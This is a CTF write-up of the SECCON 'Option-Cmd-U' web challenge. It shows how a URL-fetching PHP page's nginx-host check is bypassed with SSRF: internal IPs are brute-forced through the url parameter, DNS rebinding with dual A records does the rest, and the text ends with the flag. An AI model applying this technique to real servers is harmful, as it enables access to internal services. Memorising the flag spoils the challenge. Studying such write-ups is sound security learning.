CTFtime.org

Option-Cmd-U

by kazkiti / PwnaSonic

Tags: web dnsrebinding ssrf 

Rating:

# ▼▼▼Option-Cmd-U(Web:190、160/799=20.0%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
No more "View Page Source"!
http://ocu.chal.seccon.jp:10000/index.php

```

---

# 【Information gathering】

`http://ocu.chal.seccon.jp:10000/index.php`

↓ Access URL

```

<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Option-Cmd-U</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.5/css/bulma.min.css">
<script defer src="https://use.fontawesome.com/releases/v5.3.1/js/all.js"></script>
</head>
<body>
<div class="container">
<section class="hero">
<div class="hero-body">
<div class="container">
<h1 class="title has-text-centered has-text-weight-bold">
Option-Cmd-U
</h1>
<h2 class="subtitle has-text-centered">
"View Page Source" is no longer required! Let's view page source online :-)
</h2>
<form method="GET">
<div class="field has-addons">
<div class="control is-expanded">
<input class="input" type="text" placeholder="URL (e.g. http://example.com)" name="url" value="">
</div>
<div class="control">
<button class="button is-link">Submit</button>
</div>
</div>
</form>
</div>
</div>
</section>
<section class="section">

</section>
</div>
</body>
</html>
```

---

## 【1:/index.php?action=source】

`http://ocu.chal.seccon.jp:10000/index.php?action=source`

↓ Access URL

```

<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Option-Cmd-U</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.5/css/bulma.min.css">
<script defer src="https://use.fontawesome.com/releases/v5.3.1/js/all.js"></script>
</head>
<body>
<div class="container">
<section class="hero">
<div class="hero-body">
<div class="container">
<h1 class="title has-text-centered has-text-weight-bold">
Option-Cmd-U
</h1>
<h2 class="subtitle has-text-centered">
"View Page Source" is no longer required! Let's view page source online :-)
</h2>
<form method="GET">
<div class="field has-addons">
<div class="control is-expanded">
<input class="input" type="text" placeholder="URL (e.g. http://example.com)" name="url" value="<?= htmlspecialchars($_GET['url'], ENT_QUOTES, 'UTF-8') ?>">
</div>
<div class="control">
<button class="button is-link">Submit</button>
</div>
</div>
</form>
</div>
</div>
</section>
<section class="section">

                    
                    
                    
                     array(
                                                                       'follow_location' => false,
                                                                       'timeout' => 2
                                                                   )
                                                               ))));
                        }
                    }
                    ?>

</section>
</div>
</body>
</html>
```

↓ Check the contents below

---

`if($parsed_url["scheme"] !== "http"){`

`http` only!!

---

`} else if (gethostbyname(idn_to_ascii($parsed_url["host"], 0, INTL_IDNA_VARIANT_UTS46)) === gethostbyname("nginx")) {`

I found that localhost is `nginx`!!

Direct localhost access is prohibited!!

---

```
highlight_string(file_get_contents(idn_to_ascii($url, 0, INTL_IDNA_VARIANT_UTS46),
false,
stream_context_create(array(
'http' => array(
'follow_location' => false,
'timeout' => 2
)
))));
```

Get the URL destination file and display the source code.

Also, `do not redirect` when accessing URL.

---

Let's solve with **DNSRebinding**!!

```
(Note)Assumed solution was Host/split attack
https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf
```

---

## 【2:/flag.php】

`http://ocu.chal.seccon.jp:10000/flag.php`

Forbidden.Your IP: (My_IP_address)

The IP address of the access source is displayed

---

## 【3:/docker-compose.yml】

`http://ocu.chal.seccon.jp:10000/docker-compose.yml`

```
version: '3'

services:
nginx:
(...ommitted...)
php-fpm:
(...ommitted...

```

`Two servers` are standing.

---

# 【exploit】DNSRebinding!!

### 1.Check the access source IP address

`GET /?url=http://ocu.chal.seccon.jp:10000/flag.php`

Forbidden.Your IP: `172.25.0.1`

---

brute force the IP address of `nginx`

```
GET /?url=http://172.25.0.2/flag.php ⇒ Warning: file_get_contents(http://172.25.0.2/flag.php): failed to open stream: Connection refused in /var/www/web/index.php on line 60
GET /?url=http://172.25.0.3/flag.php ⇒ Oops, are you a robot or an attacker?
GET /?url=http://172.25.0.4/flag.php ⇒ Warning: file_get_contents(http://172.25.0.4/flag.php): failed to open stream: Host is unreachable in /var/www/web/index.php on line 60
```

The `nginx` IP address was found to be `172.25.0.3`

---

### 2.DNS settings

Set two IP addresses on the DNS server

```
localhost.my_server A 172.25.0.3
localhost.my_server A (my_server_IP_address)
```

---

### 3.Get flag

`GET /?url=http://localhost.my_server/flag.php`

`SECCON{what_a_easy_bypass_314208thg0n423g}`

Comments